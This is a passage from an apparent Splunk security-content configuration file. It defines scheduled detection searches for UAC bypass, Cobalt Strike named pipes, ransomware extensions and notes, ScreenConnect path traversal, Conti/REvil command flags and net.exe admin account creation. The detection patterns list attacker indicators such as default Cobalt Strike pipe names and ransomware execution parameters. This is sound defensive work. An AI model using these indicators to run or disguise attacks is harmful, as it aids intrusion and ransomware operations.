action.notable.param.rule_title = CMLUA Or CMSTPLUA UAC Bypass action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=7 ImageLoaded IN ("*\\CMLUA.dll", "*\\CMSTPLUA.dll", "*\\CMLUAUTIL.dll") NOT(process_name IN("CMSTP.exe", "CMMGR32.exe")) NOT(Image IN("*\\windows\\*", "*\\program files*")) | stats count min(_time) as firstTime max(_time) as lastTime by dest Image ImageLoaded process_name EventCode Signed ProcessId | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `cmlua_or_cmstplua_uac_bypass_filter` [ESCU - Cobalt Strike Named Pipes - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the use of default or publicly known named pipes used with Cobalt Strike. A named pipe is a named, one-way or duplex pipe for communication between the pipe server and one or more pipe clients. Cobalt Strike uses named pipes in many ways and has default values used with the Artifact Kit and Malleable C2 Profiles. The following query assists with identifying these default named pipes. Each EDR product presents named pipes a little differently. Consider taking the values and generating a query based on the product of choice. \ Upon triage, review the process performing the named pipe. If it is explorer.exe, it is possible it was injected into by another process. Review recent parallel processes to identify suspicious patterns or behaviors. A parallel process may have a network connection; review and follow the connection back to identify any file modifications.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the use of default or publicly known named pipes used with Cobalt Strike. A named pipe is a named, one-way or duplex pipe for communication between the pipe server and one or more pipe clients. Cobalt Strike uses named pipes in many ways and has default values used with the Artifact Kit and Malleable C2 Profiles. The following query assists with identifying these default named pipes. Each EDR product presents named pipes a little differently. Consider taking the values and generating a query based on the product of choice. \ Upon triage, review the process performing the named pipe. If it is explorer.exe, it is possible it was injected into by another process. Review recent parallel processes to identify suspicious patterns or behaviors. A parallel process may have a network connection; review and follow the connection back to identify any file modifications. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = The idea of using named pipes with Cobalt Strike is to blend in. Therefore, some of the named pipes identified and added may cause false positives. Filter by process name or pipe name to reduce false positives.
action.escu.creation_date = 2023-07-10 action.escu.modification_date = 2023-07-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Cobalt Strike Named Pipes - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Trickbot", "DarkSide Ransomware", "Cobalt Strike", "BlackByte Ransomware", "Graceful Wipe Out Attack", "LockBit Ransomware"] action.risk = 1 action.risk.param._risk_message = An instance of $process_name$ was identified on endpoint $dest$ accessing known suspicious named pipes related to Cobalt Strike. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Cobalt Strike Named Pipes - Rule action.correlationsearch.annotations = {"analytic_story": ["Trickbot", "DarkSide Ransomware", "Cobalt Strike", "BlackByte Ransomware", "Graceful Wipe Out Attack", "LockBit Ransomware"], "cis20": ["CIS 10"], "confidence": 90, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the use of default or publicly known named pipes used with Cobalt Strike. A named pipe is a named, one-way or duplex pipe for communication between the pipe server and one or more pipe clients. Cobalt Strike uses named pipes in many ways and has default values used with the Artifact Kit and Malleable C2 Profiles. 
The following query assists with identifying these default named pipes. Each EDR product presents named pipes a little differently. Consider taking the values and generating a query based on the product of choice. \ Upon triage, review the process performing the named pipe. If it is explorer.exe, it is possible it was injected into by another process. Review recent parallel processes to identify suspicious patterns or behaviors. A parallel process may have a network connection; review and follow the connection back to identify any file modifications. action.notable.param.rule_title = Cobalt Strike Named Pipes action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventID=17 OR EventID=18 PipeName IN (\\msagent_*, \\DserNamePipe*, \\srvsvc_*, \\postex_*, \\status_*, \\MSSE-*, \\spoolss_*, \\win_svc*, \\ntsvcs*, \\winsock*, \\UIA_PIPE*) | stats count min(_time) as firstTime max(_time) as lastTime by dest, process_name, process_id process_path, PipeName | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `cobalt_strike_named_pipes_filter` [ESCU - Common Ransomware Extensions - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects file modifications that commonly occur with ransomware, specifically modifications to files with extensions that are commonly used by ransomware. The detection is made by searching for changes in the datamodel=Endpoint.Filesystem, specifically modifications to file extensions that match those commonly used by ransomware.
The detection is important because it suggests that an attacker is attempting to encrypt or otherwise modify files in the environment using malware, potentially leading to data loss that can cause significant damage to an organization's data and systems. False positives might occur, so the SOC must investigate the affected system to determine the source of the modification and take appropriate action to contain and remediate the attack. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1485"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects file modifications that commonly occur with ransomware, specifically modifications to files with extensions that are commonly used by ransomware. The detection is made by searching for changes in the datamodel=Endpoint.Filesystem, specifically modifications to file extensions that match those commonly used by ransomware. The detection is important because it suggests that an attacker is attempting to encrypt or otherwise modify files in the environment using malware, potentially leading to data loss that can cause significant damage to an organization's data and systems. False positives might occur, so the SOC must investigate the affected system to determine the source of the modification and take appropriate action to contain and remediate the attack. action.escu.how_to_implement = You must be ingesting data that records the filesystem activity from your hosts to populate the Endpoint Filesystem data model node.
To see the additional metadata, add the following fields if they are not already present; detailed documentation on how to create a new field within Incident Review may be found here: `https://docs.splunk.com/Documentation/ES/5.3.0/Admin/Customizenotables#Add_a_field_to_the_notable_event_details` action.escu.known_false_positives = It is possible for a legitimate file with these extensions to be created. If this is a true ransomware attack, there will be a large number of files created with these extensions. action.escu.creation_date = 2022-11-10 action.escu.modification_date = 2022-11-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Common Ransomware Extensions - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["SamSam Ransomware", "Ryuk Ransomware", "Ransomware", "Clop Ransomware", "Prestige Ransomware", "LockBit Ransomware", "Rhysida Ransomware"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Common Ransomware Extensions - Rule action.correlationsearch.annotations = {"analytic_story": ["SamSam Ransomware", "Ryuk Ransomware", "Ransomware", "Clop Ransomware", "Prestige Ransomware", "LockBit Ransomware", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 100, "impact": 90, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1485"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as
lastTime count latest(Filesystem.user) as user values(Filesystem.file_path) as file_path from datamodel=Endpoint.Filesystem by Filesystem.file_name Filesystem.dest _time span=1h | `drop_dm_object_name(Filesystem)` | rex field=file_name "(?<file_extension>\.[^\.]+)$" | rex field=file_path "(?<true_file_path>([^\\\]*\\\)*).*" | stats min(firstTime) as firstTime max(lastTime) as lastTime latest(user) as user dc(true_file_path) as path_count dc(file_name) as file_count latest(file_name) as file_name latest(true_file_path) as file_path by dest file_extension | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `ransomware_extensions` | where path_count > 1 OR file_count > 20 | `common_ransomware_extensions_filter` [ESCU - Common Ransomware Notes - Rule] action.escu = 0 action.escu.enabled = 1 description = The search looks for files created with names matching those typically used in ransomware notes that tell the victim how to get their data back. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1485"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The search looks for files created with names matching those typically used in ransomware notes that tell the victim how to get their data back. action.escu.how_to_implement = You must be ingesting data that records file-system activity from your hosts to populate the Endpoint Filesystem data-model node. This is typically populated via an endpoint detection-and-response product, such as Carbon Black, or via other endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report file-system reads and writes. action.escu.known_false_positives = It's possible that a legitimate file could be created with the same name used by ransomware note files.
action.escu.creation_date = 2020-11-09 action.escu.modification_date = 2020-11-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Common Ransomware Notes - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["SamSam Ransomware", "Ransomware", "Ryuk Ransomware", "Clop Ransomware", "Chaos Ransomware", "LockBit Ransomware", "Rhysida Ransomware"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Common Ransomware Notes - Rule action.correlationsearch.annotations = {"analytic_story": ["SamSam Ransomware", "Ransomware", "Ryuk Ransomware", "Clop Ransomware", "Chaos Ransomware", "LockBit Ransomware", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 100, "impact": 90, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1485"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Filesystem.user) as user values(Filesystem.dest) as dest values(Filesystem.file_path) as file_path from datamodel=Endpoint.Filesystem by Filesystem.file_name | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `ransomware_notes` | `common_ransomware_notes_filter` [ESCU - ConnectWise ScreenConnect Path Traversal - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic detects attempts to exploit the ConnectWise ScreenConnect CVE-2024-1708 
vulnerability, which allows an attacker to perform path traversal attacks by manipulating the file_path and file_name parameters in the URL. The vulnerability, identified as critical with a CVSS score of 9.8, enables unauthorized users to access sensitive files and directories on the host system, potentially leading to the exfiltration of sensitive data or the execution of arbitrary code. The search query provided looks for file system events that could indicate exploitation attempts. This detection is crucial for identifying and responding to active exploitation of this vulnerability in environments running affected versions of ScreenConnect (23.9.7 and prior). It is recommended to update to version 23.9.8 or above immediately to remediate the issue, as detailed in the ConnectWise security advisory and further analyzed by Huntress researchers. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1190"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic detects attempts to exploit the ConnectWise ScreenConnect CVE-2024-1708 vulnerability, which allows an attacker to perform path traversal attacks by manipulating the file_path and file_name parameters in the URL. The vulnerability, identified as critical with a CVSS score of 9.8, enables unauthorized users to access sensitive files and directories on the host system, potentially leading to the exfiltration of sensitive data or the execution of arbitrary code. The search query provided looks for file system events that could indicate exploitation attempts. This detection is crucial for identifying and responding to active exploitation of this vulnerability in environments running affected versions of ScreenConnect (23.9.7 and prior). It is recommended to update to version 23.9.8 or above immediately to remediate the issue, as detailed in the ConnectWise security advisory and further analyzed by Huntress researchers. 
action.escu.how_to_implement = This analytic utilizes the Endpoint datamodel Filesystem node to identify path traversal attempts against ScreenConnect. Note that SACL auditing or other file system monitoring tools may also be used to detect path traversal attempts. Typically the data for this analytic will come from EDR or other properly CIM-mapped data sources.
action.escu.known_false_positives = False positives are not expected, as the detection is based on the presence of file system events that indicate path traversal attempts. The analytic may be modified to look for any file writes to this path, as it is not common for files to be written here.
action.escu.creation_date = 2024-02-21
action.escu.modification_date = 2024-02-21
action.escu.confidence = high
action.escu.full_search_name = ESCU - ConnectWise ScreenConnect Path Traversal - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["ConnectWise ScreenConnect Vulnerabilities"]
action.risk = 1
action.risk.param._risk_message = A path traversal attack against ScreenConnect has been detected on $dest$.
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 100}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - ConnectWise ScreenConnect Path Traversal - Rule
action.correlationsearch.annotations = {"analytic_story": ["ConnectWise ScreenConnect Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2024-1708", "CVE-2024-1709"], "impact": 100, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1190"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic detects attempts to exploit the ConnectWise ScreenConnect CVE-2024-1708 vulnerability, which allows an attacker to perform path traversal attacks by manipulating the file_path and file_name parameters in the URL. The vulnerability, identified as critical with a CVSS score of 9.8, enables unauthorized users to access sensitive files and directories on the host system, potentially leading to the exfiltration of sensitive data or the execution of arbitrary code. The search query provided looks for file system events that could indicate exploitation attempts. This detection is crucial for identifying and responding to active exploitation of this vulnerability in environments running affected versions of ScreenConnect (23.9.7 and prior). It is recommended to update to version 23.9.8 or above immediately to remediate the issue, as detailed in the ConnectWise security advisory and further analyzed by Huntress researchers.
action.notable.param.rule_title = ConnectWise ScreenConnect Path Traversal
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_path IN ("*\\ScreenConnect\\App_Extensions\\*") Filesystem.file_name IN ("*.aspx","*.ashx") by Filesystem.file_create_time Filesystem.process_id Filesystem.process_guid Filesystem.file_name Filesystem.file_path Filesystem.dest | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `connectwise_screenconnect_path_traversal_filter`

[ESCU - ConnectWise ScreenConnect Path Traversal Windows SACL - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic detects attempts to exploit the ConnectWise ScreenConnect CVE-2024-1708 vulnerability utilizing Windows SACL EventCode 4663, which allows an attacker to perform path traversal attacks by manipulating the file_path and file_name parameters in the URL. The vulnerability, identified as critical with a CVSS score of 9.8, enables unauthorized users to access sensitive files and directories on the host system, potentially leading to the exfiltration of sensitive data or the execution of arbitrary code. The search query provided looks for file system events that could indicate exploitation attempts. This detection is crucial for identifying and responding to active exploitation of this vulnerability in environments running affected versions of ScreenConnect (23.9.7 and prior). It is recommended to update to version 23.9.8 or above immediately to remediate the issue, as detailed in the ConnectWise security advisory and further analyzed by Huntress researchers.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1190"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This analytic detects attempts to exploit the ConnectWise ScreenConnect CVE-2024-1708 vulnerability utilizing Windows SACL EventCode 4663, which allows an attacker to perform path traversal attacks by manipulating the file_path and file_name parameters in the URL. The vulnerability, identified as critical with a CVSS score of 9.8, enables unauthorized users to access sensitive files and directories on the host system, potentially leading to the exfiltration of sensitive data or the execution of arbitrary code. The search query provided looks for file system events that could indicate exploitation attempts. This detection is crucial for identifying and responding to active exploitation of this vulnerability in environments running affected versions of ScreenConnect (23.9.7 and prior). It is recommended to update to version 23.9.8 or above immediately to remediate the issue, as detailed in the ConnectWise security advisory and further analyzed by Huntress researchers.
action.escu.how_to_implement = To implement the following query, enable SACL auditing for the ScreenConnect directory (or directories). With this data, the following analytic will work correctly. A GIST is provided in the references to assist with enabling SACL auditing.
action.escu.known_false_positives = False positives should be limited, as the analytic is specific to ScreenConnect path traversal attempts. Tune as needed, or restrict to specific hosts if false positives are encountered.
action.escu.creation_date = 2024-02-21
action.escu.modification_date = 2024-02-21
action.escu.confidence = high
action.escu.full_search_name = ESCU - ConnectWise ScreenConnect Path Traversal Windows SACL - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["ConnectWise ScreenConnect Vulnerabilities"]
action.risk = 1
action.risk.param._risk_message = A path traversal attack against ScreenConnect has been detected on $dest$.
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 100}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - ConnectWise ScreenConnect Path Traversal Windows SACL - Rule
action.correlationsearch.annotations = {"analytic_story": ["ConnectWise ScreenConnect Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2024-1708", "CVE-2024-1709"], "impact": 100, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1190"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic detects attempts to exploit the ConnectWise ScreenConnect CVE-2024-1708 vulnerability utilizing Windows SACL EventCode 4663, which allows an attacker to perform path traversal attacks by manipulating the file_path and file_name parameters in the URL. The vulnerability, identified as critical with a CVSS score of 9.8, enables unauthorized users to access sensitive files and directories on the host system, potentially leading to the exfiltration of sensitive data or the execution of arbitrary code.
The search query provided looks for file system events that could indicate exploitation attempts. This detection is crucial for identifying and responding to active exploitation of this vulnerability in environments running affected versions of ScreenConnect (23.9.7 and prior). It is recommended to update to version 23.9.8 or above immediately to remediate the issue, as detailed in the ConnectWise security advisory and further analyzed by Huntress researchers.
action.notable.param.rule_title = ConnectWise ScreenConnect Path Traversal Windows SACL
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `wineventlog_security` EventCode=4663 ProcessName=*\\ScreenConnect.Service.exe file_path IN ("*\\ScreenConnect\\App_Extensions\\*") file_name IN ("*.aspx","*.ashx") | stats count min(_time) as firstTime max(_time) as lastTime by ObjectName ObjectType ProcessName AccessMask process_id EventCode Computer Caller_User_Name | rename Computer as dest Caller_User_Name as user ProcessName as process_name | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `connectwise_screenconnect_path_traversal_windows_sacl_filter`

[ESCU - Conti Common Exec parameter - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search detects the suspicious command-line arguments used by REvil ransomware to encrypt specific or all local drives and network shares of the compromised machine or host.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search detects the suspicious command-line arguments used by REvil ransomware to encrypt specific or all local drives and network shares of the compromised machine or host.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Third-party tools may have command-line parameters that can trigger this detection.
action.escu.creation_date = 2021-06-02
action.escu.modification_date = 2021-06-02
action.escu.confidence = high
action.escu.full_search_name = ESCU - Conti Common Exec parameter - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Ransomware"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ executing specific Conti Ransomware related parameters.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 64}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 64}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Conti Common Exec parameter - Rule
action.correlationsearch.annotations = {"analytic_story": ["Ransomware"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search detects the suspicious command-line arguments used by REvil ransomware to encrypt specific or all local drives and network shares of the compromised machine or host.
action.notable.param.rule_title = Conti Common Exec parameter
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process = "*-m local*" OR Processes.process = "*-m net*" OR Processes.process = "*-m all*" OR Processes.process = "*-nomutex*" by Processes.process_name Processes.process Processes.parent_process_name Processes.parent_process Processes.dest Processes.user Processes.process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `conti_common_exec_parameter_filter`

[ESCU - Control Loading from World Writable Directory - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following detection identifies control.exe loading either a .cpl or .inf from a writable directory. This is related to CVE-2021-40444. During triage, review parallel processes, parent and child, for further suspicious behaviors. In addition, capture file modifications and analyze.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.002"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following detection identifies control.exe loading either a .cpl or .inf from a writable directory. This is related to CVE-2021-40444. During triage, review parallel processes, parent and child, for further suspicious behaviors. In addition, capture file modifications and analyze.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents.
These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Limited false positives will be present, as control.exe does not natively load from writable paths as defined. One may add .cpl or .inf to the command-line filter if there are any false positives. Tune as needed.
action.escu.creation_date = 2021-09-08
action.escu.modification_date = 2021-09-08
action.escu.confidence = high
action.escu.full_search_name = ESCU - Control Loading from World Writable Directory - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Microsoft MSHTML Remote Code Execution CVE-2021-40444", "Living Off The Land"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to load a suspicious file from disk.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Control Loading from World Writable Directory - Rule
action.correlationsearch.annotations = {"analytic_story": ["Microsoft MSHTML Remote Code Execution CVE-2021-40444", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2021-40444"], "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.002"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following detection identifies control.exe loading either a .cpl or .inf from a writable directory. This is related to CVE-2021-40444. During triage, review parallel processes, parent and child, for further suspicious behaviors. In addition, capture file modifications and analyze.
action.notable.param.rule_title = Control Loading from World Writable Directory
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=control.exe OR Processes.original_file_name=CONTROL.EXE) AND Processes.process IN ("*\\appdata\\*", "*\\windows\\temp\\*", "*\\programdata\\*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `control_loading_from_world_writable_directory_filter`

[ESCU - Create local admin accounts using net exe - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic detects the creation of local administrator accounts using the net.exe command to mitigate the risks associated with unauthorized access and prevent further damage to the environment by responding to potential threats earlier and taking appropriate actions to protect the organization's systems and data. This detection is made by a Splunk query to search for processes with the name net.exe or net1.exe that include the "/add" parameter and have specific keywords related to administrator accounts in their process name. This detection is important because the creation of unauthorized local administrator accounts might indicate that an attacker has successfully created a new administrator account and is trying to gain persistent access to a system or escalate their privileges for data theft, or other malicious activities.
False positives might occur since there might be legitimate uses of the net.exe command and the creation of administrator accounts in certain circumstances. You must consider the context of the activity and other indicators of compromise before taking any action. For next steps, review the details of the identified process, including the user, parent process, and parent process name. Examine any relevant on-disk artifacts and look for concurrent processes to determine the source of the attack.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.001", "T1136"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic detects the creation of local administrator accounts using the net.exe command to mitigate the risks associated with unauthorized access and prevent further damage to the environment by responding to potential threats earlier and taking appropriate actions to protect the organization's systems and data. This detection is made by a Splunk query to search for processes with the name net.exe or net1.exe that include the "/add" parameter and have specific keywords related to administrator accounts in their process name. This detection is important because the creation of unauthorized local administrator accounts might indicate that an attacker has successfully created a new administrator account and is trying to gain persistent access to a system or escalate their privileges for data theft, or other malicious activities. False positives might occur since there might be legitimate uses of the net.exe command and the creation of administrator accounts in certain circumstances. You must consider the context of the activity and other indicators of compromise before taking any action. For next steps, review the details of the identified process, including the user, parent process, and parent process name.
Examine any relevant on-disk artifacts and look for concurrent processes to determine the source of the attack.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators often leverage net.exe to create admin accounts.
action.escu.creation_date = 2023-11-07
action.escu.modification_date = 2023-11-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - Create local admin accounts using net exe - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
